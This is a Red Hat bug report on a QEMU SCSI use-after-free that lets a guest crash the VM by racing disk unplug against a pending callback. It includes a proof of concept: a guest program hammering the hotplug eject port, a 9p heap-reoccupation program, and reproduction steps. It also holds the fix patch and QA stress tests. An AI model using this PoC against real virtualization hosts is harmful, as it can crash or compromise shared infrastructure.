Bug 1854811 - scsi-bus.c: use-after-free due to race between device unplug and I/O operation causes guest crash
Summary: scsi-bus.c: use-after-free due to race between device unplug and I/O operation causes guest crash
Keywords:
Status: CLOSED ERRATA
Alias: None
Product: Red Hat Enterprise Linux Advanced Virtualization
Classification: Red Hat
Component: qemu-kvm
Version: 8.2
Hardware: All
OS: Linux
Priority: unspecified
Severity: medium
Target Milestone: rc
Target Release: 8.3
Assignee: Maxim Levitsky
QA Contact: qing.wang
URL:
Whiteboard:
Depends On:
Blocks:
 
Reported: 2020-07-08 09:41 UTC by Prasad Pandit
Modified: 2021-05-25 06:42 UTC (History)
CC List: 7 users

Fixed In Version: qemu-kvm-5.2.0-6.module+el8.4.0+9871+53903be9
Doc Type: If docs needed, set a value
Doc Text:
Clone Of:
Environment:
Last Closed: 2021-05-25 06:42:26 UTC
Type: Bug
Target Upstream Version:
Embargoed:


Attachments (Terms of Use)
Qemu-scsi-use-after-free-reproducer (6.50 KB, application/x-tar)
2020-07-08 09:41 UTC, Prasad Pandit

Description Prasad Pandit 2020-07-08 09:41:16 UTC
Created attachment 1700266 [details]
Qemu-scsi-use-after-free-reproducer

Wenxiang Qian <leonwxqian> has reported this issue. It is quite similar to BZ#1812399.

  -> https://drive.google.com/file/d/1qGptfDhKJNs5OLQ6a2HPuT_-kRuvIBCu/view
  -> https://www.nul.pw/usr/uploads/2020/07/3118145955.jpg

Description of problem:

Overview:
=========
The "opaque" object in scsi_dma_restart_bh can be used after free. The operation qemu_bh_delete(s->bh); will use the freed "opaque (s)" object directly.

Freed "s (opaque)" can be occupied by other data, so the s->bh can point to
arbitrary address and freed by qemu_bh_delete later:

    void qemu_bh_delete(QEMUBH *bh){
        g_free(bh);
    }

Root cause of the vulnerability:
================================
1. Whenever a SCSI device is added/plugged into the guest, the callback
   scsi_dma_restart_cb is registered.
2. When the guest's run state changes, the callback scsi_dma_restart_cb is
   called; if the guest is not in the shutdown process, it schedules the
   bottom half scsi_dma_restart_bh with opaque=s.
3. In the main I/O thread there is a glib_pollfds_poll loop; when an fd is
   ready, AIO operations are called and scsi_dma_restart_bh runs.
   (The 'USE' part.)
4. Meanwhile, an attacker can write to an IOPORT to unplug the device; in
   another thread this triggers acpi_pcihp_eject_slot, then device_unparent,
   which frees the memory related to the device. (The 'FREE' part.)
5. Steps (3) and (4) race; if (4) happens before (3), there is a UAF.

Related code:
 *hw/scsi/scsi-bus.c*:scsi_dma_restart_cb, scsi_dma_restart_bh
 *hw/acpi/pcihp.c*:acpi_pcihp_eject_slot
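
For illustration, here is a minimal stand-alone sketch of the ordering above
(plain C, not QEMU code; all names are hypothetical). A deferred callback
captures a raw pointer to the device, the unplug path frees the device first,
and the callback then runs on the dangling pointer; building with
-fsanitize=address makes the use-after-free visible:

    /* uaf_sketch.c -- hypothetical illustration, not QEMU code.
       Build: gcc -fsanitize=address uaf_sketch.c -o uaf_sketch */
    #include <stdio.h>
    #include <stdlib.h>

    typedef struct FakeDevice {
        void *bh;                        /* stands in for SCSIDevice's s->bh */
    } FakeDevice;

    /* Stands in for scsi_dma_restart_bh(), run later with opaque = device. */
    static void dma_restart_bh(void *opaque)
    {
        FakeDevice *s = opaque;
        free(s->bh);                     /* like qemu_bh_delete(s->bh):
                                            reads s->bh from the freed object */
        s->bh = NULL;
    }

    int main(void)
    {
        FakeDevice *s = calloc(1, sizeof(*s));
        s->bh = malloc(16);              /* stands in for aio_bh_new() */

        /* Steps 1-3: the run-state callback schedules the bottom half,
           capturing a raw pointer to the device. */
        void (*pending_bh)(void *) = dma_restart_bh;
        void *pending_opaque = s;

        /* Step 4: unplug (acpi_pcihp_eject_slot -> device_unparent)
           frees the device before the bottom half has run. */
        free(s->bh);
        free(s);

        /* Step 5: the bottom half finally runs -> use-after-free. */
        pending_bh(pending_opaque);
        return 0;
    }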


Version-Release number of selected component (if applicable):
  - Host: Ubuntu 16.04 x86_64
  - Guest: Ubuntu 18.04 x86_64
  - Qemu: 4.2.0 (I checked the commits between 4.2.0 and 5.0.0 and I believe
    5.0.0 has the same problem)
  - libvirt: 6.0.0 with KVM enabled

How reproducible:
  - Intermittent; the crash occurs only sometimes.

Steps to Reproduce:

Different Ways To Trigger the Use-after-free:
=============================================
a. If the guest system can be suspended (paused), here is a simple way to test:

  1. Determine the slot number that disk X will occupy when attached (by
     finding the next available slot number with lspci).
  2. Do not attach disk X yet. Start a program in the guest that
     *infinitely* writes (1 << slot) to the IOPORT of the bus, trying to
     release disk X (io2.c in the PoC below is such a program).
  3. Pause the guest and attach disk X.
  4. Resume the guest. The bh callback and the IOPORT write should now run
     at the same time and can cause the UAF by chance. If it does not
     succeed, repeat steps 3-4.

PoC:
====
1. Create a disk image and install Ubuntu on it, then update "source file=" in d.xml
   to the path of the disk image. (The disk I used is about 4 GB; if you need it, I can
   share it through something like Google Cloud Storage.)

    <disk type='file' device='disk'>
      <driver name='qemu' type='qcow2'/>
      <source file='/foo/bar.qcow2'/>              <==  <!--here-->
      <target dev='sda' bus='scsi'/>
      <address type='drive' controller='0' bus='0' target='0' unit='0'/>
    </disk>


2. We used 9p to reoccupy the memory of the freed object via the strdup (malloc)
   in the 9p server. On the host, create a new directory such as ~/share, and
   inside it create the folder tree AAAA..(255 'A's)/BBBB..(255 'B's)/AAAAAAAAAA
   (10 'A's), matching 9pacc.c below. This sets up a 255+1+255+1+10 = 522-byte
   path, the same size as the freed SCSIDevice object (64-bit). A small helper
   sketch for creating these directories follows below.

   Then modify the directory in d.xml to point it at ~/share:
     -> <qemu:arg value='local,id=share,path=/home/foo/share,security_model=none'/>
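
   Because typing the 255-character names by hand is error-prone, here is a
   small hypothetical helper (not part of the original PoC; BASE is an
   assumption, adjust it to your share directory) that creates the nested
   directories on the host:

    /* mkpath.c -- hypothetical helper, not part of the original PoC.
       Creates BASE/AAA..(255 'A's)/BBB..(255 'B's)/AAAAAAAAAA so the
       relative path is 255 + 1 + 255 + 1 + 10 = 522 bytes, matching the
       component names used by 9pacc.c below. */
    #include <stdio.h>
    #include <string.h>
    #include <sys/stat.h>

    #define BASE "/home/foo/share"      /* assumption: host share dir */

    int main(void)
    {
        char a[256], b[256], path[1024];

        memset(a, 'A', 255); a[255] = '\0';
        memset(b, 'B', 255); b[255] = '\0';

        snprintf(path, sizeof(path), "%s/%s", BASE, a);
        mkdir(path, 0755);
        snprintf(path, sizeof(path), "%s/%s/%s", BASE, a, b);
        mkdir(path, 0755);
        snprintf(path, sizeof(path), "%s/%s/%s/AAAAAAAAAA", BASE, a, b);
        mkdir(path, 0755);
        return 0;
    }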

3. Create a disk: for example, run `qemu-img create -f qcow2 ./foo.qcow2 10M` on the
   host, then update the disk path in disk1.xml to ./foo.qcow2.

4. Run `virsh create d.xml`; a guest machine with the name "testpoc"
   should then be listed in libvirt.

5. Connect to testpoc, then write and compile this program in the guest:
   //io2.c: hammer the hotplug eject IOPORT to keep unplugging the disk
  #include <stdio.h>
  #include <sys/io.h>

  int main(void)
  {
     if (iopl(3) < 0) {        /* raise I/O privilege level; run as root */
        perror("iopl");
        return 1;
     }
     while (1) {
        outb(1 << 2, 0xae08);  /* request eject of slot 2 */
     }
     return 0;
  }

  Compile with: gcc -O2 ./io2.c -o ./io2

6. Please compile this one in the guest too:
  //9pacc.c: repeatedly open the 522-byte 9p path so the server's strdup
  //of the name reoccupies the freed SCSIDevice allocation
  #include <stdio.h>
  #include <stdlib.h>
  #include <string.h>
  #include <unistd.h>
  #include <dirent.h>

  #define FSIZE  0x300

  int main(void)
  {
     char foo[256] = {0};
     char boo[256] = {0};
     char foldername[FSIZE] = {0};

     memset(foo, 0x41, 255);    /* 255 'A's */
     memset(boo, 0x42, 255);    /* 255 'B's */
     snprintf(foldername, FSIZE, "/home/leonwxqian/share/%s/%s/AAAAAAAAAA", foo, boo);

     DIR *dir = NULL;
     while (1) {
        dir = opendir(foldername);
        if (dir) {
           closedir(dir);
        }
     }

     return 0;
  }
  Compile with: gcc ./9pacc.c -o ./9pacc

7. Create the folder ~/share in the guest, then mount the 9p share (change the path to the directory you created in step 2!):

  sudo mount -t 9p -o trans=virtio,version=9p2000.L share /home/leonwxqian/share

8. Start "./9pacc &" in guest
9. Start "sudo ./io2" in guest

10. Run "poc.sh" in the host machine, if it is not succeeded, run poc.sh again.


Actual results:
  - Guest VM crashes
  - https://www.nul.pw/usr/uploads/2020/07/3118145955.jpg

Expected results:
  - The guest should not crash.


Additional info:

Comment 1 Prasad Pandit 2020-07-08 09:44:25 UTC
Proposed fix patch from Paolo Bonzini

| I think this is simpler than the issue that Maxim is working on.
| Wenxiang, would this fix your PoC?
| 
| diff --git a/hw/scsi/scsi-bus.c b/hw/scsi/scsi-bus.c
| index 1c980cab38..1b0cf91532 100644
| --- a/hw/scsi/scsi-bus.c
| +++ b/hw/scsi/scsi-bus.c
| @@ -137,6 +137,7 @@ static void scsi_dma_restart_bh(void *opaque)
|          scsi_req_unref(req);
|      }
|      aio_context_release(blk_get_aio_context(s->conf.blk));
| +    object_unref(OBJECT(s));
|  }
| 
|  void scsi_req_retry(SCSIRequest *req)
| @@ -155,6 +156,8 @@ static void scsi_dma_restart_cb(void *opaque, int
| running, RunState state)
|      }
|      if (!s->bh) {
|          AioContext *ctx = blk_get_aio_context(s->conf.blk);
| +        /* The reference is dropped in scsi_dma_restart_bh.  */
| +        object_ref(OBJECT(s));
|          s->bh = aio_bh_new(ctx, scsi_dma_restart_bh, s);
|          qemu_bh_schedule(s->bh);
|      }
| 
| Thanks,
| Paolo
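
The patch pins the device for the lifetime of the scheduled bottom half:
object_ref() is taken when the BH is scheduled and object_unref() drops it
after the BH has run, so an unplug in between can no longer free the device
underneath the callback. A stand-alone sketch of that pattern (plain C with a
manual refcount, not QEMU's QOM API; all names are hypothetical):

    /* refpin_sketch.c -- hypothetical illustration of the fix's pattern,
       not QEMU code. */
    #include <stdlib.h>

    typedef struct RefDevice {
        int refcount;
        void *bh;
    } RefDevice;

    static void device_ref(RefDevice *s)   { s->refcount++; }

    static void device_unref(RefDevice *s)
    {
        if (--s->refcount == 0) {
            free(s);                   /* freed only when the last ref drops */
        }
    }

    /* Like scsi_dma_restart_bh(): drops the pin taken at schedule time. */
    static void dma_restart_bh(void *opaque)
    {
        RefDevice *s = opaque;
        /* ... restart queued requests; s is guaranteed alive here ... */
        free(s->bh);
        s->bh = NULL;
        device_unref(s);               /* object_unref(OBJECT(s)) */
    }

    /* Like scsi_dma_restart_cb(): pins the device before scheduling. */
    static void dma_restart_cb(RefDevice *s)
    {
        if (!s->bh) {
            device_ref(s);             /* object_ref(OBJECT(s)), dropped in bh */
            s->bh = malloc(16);        /* stands in for aio_bh_new() */
        }
    }

    int main(void)
    {
        RefDevice *s = calloc(1, sizeof(*s));
        s->refcount = 1;
        dma_restart_cb(s);             /* schedule: refcount == 2 */
        device_unref(s);               /* unplug drops its ref: refcount == 1 */
        dma_restart_bh(s);             /* bh runs, then s is freed safely */
        return 0;
    }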

Comment 2 qing.wang 2020-07-13 07:49:45 UTC
Hi, could you please describe how a customer would reproduce this issue? For example, the qemu command line used to create the VM, and what actions may hit this issue.

Comment 3 Prasad Pandit 2020-07-14 05:43:14 UTC
Hello Qing,

(In reply to qing.wang from comment #2)
> Hi, could you please describe how a customer would reproduce this issue?
> For example, the qemu command line used to create the VM, and what actions
> may hit this issue.

The attachment here contains 3 files - d.xml, disk1.xml and poc.sh

d.xml has the guest configuration and command line parameters in it.
Guest starts with

  $ virsh create --console d.xml

We need to edit d.xml and disk1.xml to set local guest image and qemu paths
as described above.

Hope it helps. Thank you.

Comment 7 Maxim Levitsky 2020-12-10 12:39:24 UTC
I tried to reproduce this with the latest qemu
(which contains my and Paolo's scsi/rcu work),
and I wasn't able to hit it yet; however, I do think that,
at least in theory, the race is still there.

For the use-after-free to happen, this sequence of events
should still be possible in theory:

1. the vm continue event schedules scsi_dma_restart_bh
   (this has to happen before the scsi device is unrealized,
    because the first thing scsi_qdev_unrealize does is
    remove the VM state change callback which schedules
    scsi_dma_restart_bh)

2. the scsi device is unrealized, dropped off the bus, and scheduled
   for removal by the RCU callback

3. the rcu thread callback frees the scsi device

4. for some reason, only now does the bottom half run

I'll send Paolo's patch upstream to discuss it there.

Best regards,
   Maxim Levitsky

Comment 8 John Ferlan 2020-12-18 14:32:03 UTC
Resolved by qemu-kvm upstream commit cfd4e36352d4426221aa94da44a172da1aaa741b

Setting ITM=13 under the assumption Maxim will be able to post the downstream patch soon

We will need a qa_ack+ please too. Feel free to alter the ITM I chose to a later value.

Comment 15 Maxim Levitsky 2021-01-28 09:16:29 UTC
Yep.

Comment 20 qing.wang 2021-02-19 03:20:52 UTC
Test on
Red Hat Enterprise Linux release 8.4 Beta (Ootpa)
4.18.0-287.el8.x86_64
qemu-kvm-common-5.2.0-6.module+el8.4.0+9871+53903be9.x86_64

Test steps refer to https://bugzilla.redhat.com/show_bug.cgi?id=1812399#c27

Scenario 1: 
1.boot vm
virsh define pc.xml;virsh start pc

2.hotplug-unplug disk repeatly
while true;do virsh attach-device pc disk.xml; virsh detach-device pc disk.xml;done

Running over 10 hour , no crash issue found.

Scenario 2: 

1. Create 41 image files (stg0 through stg40):
qemu-img create -f qcow2 /home/kvm_autotest_root/images/stg0.qcow2 1G
...
qemu-img create -f qcow2 /home/kvm_autotest_root/images/stg40.qcow2 1G

2. Boot the VM:
/usr/libexec/qemu-kvm \
    -name 'avocado-vt-vm1'  \
    -sandbox on  \
    -machine pc \
    -device pcie-root-port,id=pcie-root-port-0,multifunction=on,bus=pci.0,addr=0x2,chassis=1 \
    -device pcie-pci-bridge,id=pcie-pci-bridge-0,addr=0x0,bus=pcie-root-port-0  \
    -nodefaults \
    -device VGA,bus=pci.0,addr=0x3 \
    -m 2048  \
    -smp 12,maxcpus=12,cores=6,threads=1,sockets=2  \
    -device pcie-root-port,id=pcie-root-port-1,bus=pci.0,chassis=2 \
    -device pcie-root-port,id=pcie-root-port-2,port=0x2,bus=pci.0,chassis=3 \
    -device qemu-xhci,id=usb1,bus=pcie-root-port-1,addr=0x0 \
    -device usb-tablet,id=usb-tablet1,bus=usb1.0,port=1 \
    -object iothread,id=iothread1 \
    -device virtio-scsi,id=scsi0 \
    -device virtio-scsi,id=scsi1,iothread=iothread1 \
    -drive id=drive_image1,if=none,snapshot=off,aio=threads,cache=none,format=qcow2,file=/home/kvm_autotest_root/images/rhel831-64-virtio-scsi.qcow2 \
    -device scsi-hd,id=image1,drive=drive_image1,bootindex=0,bus=scsi0.0 \
    \
    -blockdev node-name=test_disk0,driver=file,filename=/home/kvm_autotest_root/images/stg0.qcow2 \
    -device scsi-hd,drive=test_disk0,bus=scsi1.0,bootindex=-1,id=scsi_disk0,channel=0,scsi-id=0,lun=0,share-rw \
    -blockdev node-name=test_disk1,driver=file,filename=/home/kvm_autotest_root/images/stg1.qcow2 \
    -blockdev node-name=test_disk2,driver=file,filename=/home/kvm_autotest_root/images/stg2.qcow2 \
    -blockdev node-name=test_disk3,driver=file,filename=/home/kvm_autotest_root/images/stg3.qcow2 \
    -blockdev node-name=test_disk4,driver=file,filename=/home/kvm_autotest_root/images/stg4.qcow2 \
    -blockdev node-name=test_disk5,driver=file,filename=/home/kvm_autotest_root/images/stg5.qcow2 \
    -blockdev node-name=test_disk6,driver=file,filename=/home/kvm_autotest_root/images/stg6.qcow2 \
    -blockdev node-name=test_disk7,driver=file,filename=/home/kvm_autotest_root/images/stg7.qcow2 \
    -blockdev node-name=test_disk8,driver=file,filename=/home/kvm_autotest_root/images/stg8.qcow2 \
    -blockdev node-name=test_disk9,driver=file,filename=/home/kvm_autotest_root/images/stg9.qcow2 \
    -blockdev node-name=test_disk10,driver=file,filename=/home/kvm_autotest_root/images/stg10.qcow2 \
    -blockdev node-name=test_disk11,driver=file,filename=/home/kvm_autotest_root/images/stg11.qcow2 \
    -blockdev node-name=test_disk12,driver=file,filename=/home/kvm_autotest_root/images/stg12.qcow2 \
    -blockdev node-name=test_disk13,driver=file,filename=/home/kvm_autotest_root/images/stg13.qcow2 \
    -blockdev node-name=test_disk14,driver=file,filename=/home/kvm_autotest_root/images/stg14.qcow2 \
    -blockdev node-name=test_disk15,driver=file,filename=/home/kvm_autotest_root/images/stg15.qcow2 \
    -blockdev node-name=test_disk16,driver=file,filename=/home/kvm_autotest_root/images/stg16.qcow2 \
    -blockdev node-name=test_disk17,driver=file,filename=/home/kvm_autotest_root/images/stg17.qcow2 \
    -blockdev node-name=test_disk18,driver=file,filename=/home/kvm_autotest_root/images/stg18.qcow2 \
    -blockdev node-name=test_disk19,driver=file,filename=/home/kvm_autotest_root/images/stg19.qcow2 \
    -blockdev node-name=test_disk20,driver=file,filename=/home/kvm_autotest_root/images/stg20.qcow2 \
    -blockdev node-name=test_disk21,driver=file,filename=/home/kvm_autotest_root/images/stg21.qcow2 \
    -blockdev node-name=test_disk22,driver=file,filename=/home/kvm_autotest_root/images/stg22.qcow2 \
    -blockdev node-name=test_disk23,driver=file,filename=/home/kvm_autotest_root/images/stg23.qcow2 \
    -blockdev node-name=test_disk24,driver=file,filename=/home/kvm_autotest_root/images/stg24.qcow2 \
    -blockdev node-name=test_disk25,driver=file,filename=/home/kvm_autotest_root/images/stg25.qcow2 \
    -blockdev node-name=test_disk26,driver=file,filename=/home/kvm_autotest_root/images/stg26.qcow2 \
    -blockdev node-name=test_disk27,driver=file,filename=/home/kvm_autotest_root/images/stg27.qcow2 \
    -blockdev node-name=test_disk28,driver=file,filename=/home/kvm_autotest_root/images/stg28.qcow2 \
    -blockdev node-name=test_disk29,driver=file,filename=/home/kvm_autotest_root/images/stg29.qcow2 \
    -blockdev node-name=test_disk30,driver=file,filename=/home/kvm_autotest_root/images/stg30.qcow2 \
    -blockdev node-name=test_disk31,driver=file,filename=/home/kvm_autotest_root/images/stg31.qcow2 \
    -blockdev node-name=test_disk32,driver=file,filename=/home/kvm_autotest_root/images/stg32.qcow2 \
    -blockdev node-name=test_disk33,driver=file,filename=/home/kvm_autotest_root/images/stg33.qcow2 \
    -blockdev node-name=test_disk34,driver=file,filename=/home/kvm_autotest_root/images/stg34.qcow2 \
    -blockdev node-name=test_disk35,driver=file,filename=/home/kvm_autotest_root/images/stg35.qcow2 \
    -blockdev node-name=test_disk36,driver=file,filename=/home/kvm_autotest_root/images/stg36.qcow2 \
    -blockdev node-name=test_disk37,driver=file,filename=/home/kvm_autotest_root/images/stg37.qcow2 \
    -blockdev node-name=test_disk38,driver=file,filename=/home/kvm_autotest_root/images/stg38.qcow2 \
    -blockdev node-name=test_disk39,driver=file,filename=/home/kvm_autotest_root/images/stg39.qcow2 \
    -blockdev node-name=test_disk40,driver=file,filename=/home/kvm_autotest_root/images/stg40.qcow2 \
    \
    -device pcie-root-port,id=pcie-root-port-3,port=0x3,bus=pci.0,chassis=4 \
    -device virtio-net-pci,mac=9a:21:f7:4a:1e:bd,id=idRuZxfv,netdev=idOpPVAe,bus=pcie-root-port-3,addr=0x0  \
    -netdev tap,id=idOpPVAe,vhost=on  \
    -rtc base=localtime,clock=host,driftfix=slew  \
    -boot menu=off,order=cdn,once=c,strict=off \
    -enable-kvm \
    -vnc :5  \
    -device pcie-root-port,id=pcie_extra_root_port_0,bus=pci.0 \
    -monitor stdio \
    -chardev file,id=qmp_id_qmpmonitor1,path=/var/tmp/monitor-qmpdbg.log,server,nowait \
    -mon chardev=qmp_id_qmpmonitor1,mode=control  \
    -qmp tcp:0:5955,server,nowait  \
    -chardev file,path=/var/tmp/monitor-serialdbg.log,id=serial_id_serial0 \
    -device isa-serial,chardev=serial_id_serial0

3. Log in to the guest and execute sg_luns with multiple instances:
trap 'kill $(jobs -p)' EXIT SIGINT

for i in `seq 0 32` ; do
    while true ; do
        # sg_luns /dev/sdb > /dev/null 2>&1
        sg_luns /dev/sdb
    done &
done
echo "wait"
wait

4. Hotplug and unplug multiple disks repeatedly, every 3 seconds:
NUM_LUNS=40
add_devices() {
  exec 3<>/dev/tcp/localhost/5955
  echo "$@"
  echo -e "{'execute':'qmp_capabilities'}" >&3
  read response <&3
  echo $response
  for i in $(seq 1 $NUM_LUNS) ; do
  cmd="{'execute':'device_add', 'arguments': {'driver':'scsi-hd','drive':'test_disk$i','id':'scsi_disk$i','bus':'scsi1.0','lun':$i}}"
  echo "$cmd"
  echo -e "$cmd" >&3
  read response <&3
  echo "$response"
  done
}

remove_devices() {
  exec 3<>/dev/tcp/localhost/5955
  echo "$@"
  echo -e "{'execute':'qmp_capabilities'}" >&3
  read response <&3
  echo $response
  for i in $(seq 1 $NUM_LUNS) ; do
  cmd="{'execute':'device_del', 'arguments': {'id':'scsi_disk$i'}}"
  echo "$cmd"
  echo -e "$cmd" >&3
  read response <&3
  echo "$response"
  done
}


while true ; do
    echo "adding devices"
    add_devices
    sleep 3
    echo "removing devices"
    remove_devices
    sleep 3
done

Running over 10 hours, no crash issue found.

Comment 22 errata-xmlrpc 2021-05-25 06:42:26 UTC
Since the problem described in this bug report should be
resolved in a recent advisory, it has been closed with a
resolution of ERRATA.

For information on the advisory (virt:av bug fix and enhancement update), and where to find the updated
files, follow the link below.

If the solution does not work for you, open a new bug report.

https://access.redhat.com/errata/RHBA-2021:2098

